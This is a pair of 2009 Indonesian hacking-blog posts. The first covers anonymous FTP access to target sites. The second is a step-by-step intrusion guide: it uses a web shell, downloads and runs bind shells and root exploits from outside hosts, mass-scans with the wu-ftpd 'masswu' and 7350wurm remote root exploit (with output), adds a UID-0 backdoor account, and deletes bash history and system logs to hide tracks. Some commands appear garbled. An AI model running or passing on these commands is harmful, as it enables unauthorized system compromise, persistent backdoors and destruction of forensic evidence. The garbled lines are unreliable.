-=adulhere=-

welcome plend adul here……..

FTP Attack

FTP (singkatan dari File Transfer Protocol) adalah sebuah protokol Internet yang berjalan di dalam lapisan aplikasi yang merupakan standar untuk pentransferan berkas (file) komputer antar mesin-mesin dalam sebuah internetwork.

Sebenernya ini tekhnik untung-untungan, memanfaatkan kelalaian admin situs atau penyedia hosting yang memungkinkan pengguna anonymous di ijinkan mengakses FTP.. 1

ok, langsung aja, silahkan coba :

1. Run >> CMD
2. Ketik ftp situstarget.com
3. jika beruntung akan muncul tulisan seperti berikut :

a.


Connected to situstarget.com.
220———- Welcome to PureFTPd 1.0.12 ———-
220-You are user number 2 of 50 allowed.
220-Local time is now 15:21 and the load is 0.03. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (situstarget.com:(none)):

Tapi jika tidak beruntung maka akan muncul tulisan seperti ini :
b.

Connected to situstarget.com.
220———- Welcome to Pure-FTPd [TLS] ———-
220-You are user number 1 of 50 allowed.
220-Local time is now 21:31. Server port: 21.
220-This is a private system – No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 30 minutes of inactivity.
User (situstarget.com:(none)):

atau

c.

Connected to situstarget.com.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:119.235.18.72]
User (situstarget.com:(none)):

Apa bedanya pesan tersebut..?
a. = Mengijinkan pengguna anonymous mengakses FTP
b. dan c. = Tidak di ijinkan

4. Nah kalau yang muncul adalah pesan yang pertama, maka kamu cukup mengetikan “anonymous” sebagai username lalu enter.

Connected to situstarget.com.
220———- Welcome to PureFTPd 1.0.12 ———-
220-You are user number 2 of 50 allowed.
220-Local time is now 15:21 and the load is 0.03. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (situstarget.com:(none)): anonymous
331 Any password will work
Password:
230 Any password will work

pada pesan tersebut terdapat pesan “Any password will work” pasti dah tau artinya kan..? 10

Sekarang kamu memiliki akses FTP, dan untuk melihat command apa aja yang tersedia, kam bisa mengetikan help.

Semoga bermanfaat.. 1

November 8, 2009 Posted by | Bedah Website | | Tinggalkan komentar

Shell,BackDoor Web Attack

cara bermain di shell target
=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
— target.com ping statistics —
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28…
Connected to target.com (210.189.77.28).
Escape character is ‘^]’.
—————————————————
#### cd /var/tmp ; wget http://www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
—————————————————-
#### cd /var/tmp ; wget http://www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
—————————————————-
# test pake `uname -a` masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell

### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`

## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`

## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet http://www.target.com 6029

-*——————-*-
-*- belajar NgeRoot -*-
-*——————-*-

### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya :p
### atau bisa ambil exploit di http://www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+—————————————————————————————-+

-*—————–*-
-*- Cracking Root -*-
-*—————–*-
Tips:
mkdir .bash <— untuk membuat direktori bash
cd .bash <— untuk masuk ke direktori bash
mkdir <— untuk membuat direktory baru
cd <— untuk masuk ke direktory yg anda mau
cd / <— untuk keluar dari suatu direktory
rm -rf <— untuk menghapus file/direktory
-*———————————————–*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp

wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz

-*——*-

2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut

Trying get root 213.124.151.113 …
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 …
Logged in log-root …

Itu berarti anda telah dapat akses root di IP 213.124.151.113

-*——*-

3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda

masuk ke direktory ftp anda

cd ftp
./awu 213.124.151.113 ( ip nya)

apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:

7350wurm – x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

# trying to log into 213.124.151.113 with (ftp/mozilla@) … connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################

uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

whoami

root <– berarti anda sedang dalam akses root

-*——*-

4. Tahap Keempat

Add login akses root anda
—————————————————————-

1. Cara I

(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok < ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*——*-

6. Tahap Keenam

Hapus jejak ngeroot anda ketik perintah berikut:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

SELESAI…..

November 6, 2009 Posted by | Bedah Website | Tinggalkan komentar

Ikuti

Kirimkan setiap pos baru ke Kotak Masuk Anda.